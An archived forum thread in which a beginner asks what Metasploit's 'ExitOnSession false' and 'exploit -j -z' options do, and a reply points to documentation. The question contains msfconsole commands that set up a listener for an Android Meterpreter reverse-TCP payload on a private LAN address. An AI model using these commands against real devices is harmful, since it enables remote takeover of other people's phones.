PDA

View Full Version : MSF console commands (newbie)



geodude9537
2018-09-30, 16:28
Is there anyplace that explains all the unique anad extended commands in metesploit?
for example why would i use "set ExitOnSession false" and "exploit -j -z"
instead of just exploit for the last line????

example
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.130
set LPORT 4444
set ExitOnSession false ???
exploit -j -z ???

my way
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.130
set LPORT 4444
exploit

Mister_X
2018-09-30, 21:51
Metasploit unleashed might have some of them: https://www.offensive-security.com/metasploit-unleashed/

But for the others, probably the documentation: https://help.rapid7.com/metasploit/index.html

geodude9537
2018-10-02, 01:35
Metasploit unleashed might have some of them: https://www.offensive-security.com/metasploit-unleashed/

But for the others, probably the documentation: https://help.rapid7.com/metasploit/index.html

yea i checked them out pretty well before posting , didnt enlighten me much, thanks anyway, But i keep going deeper and deeper in Google and keep coming up with wonderful little tidbit in a lot of different places.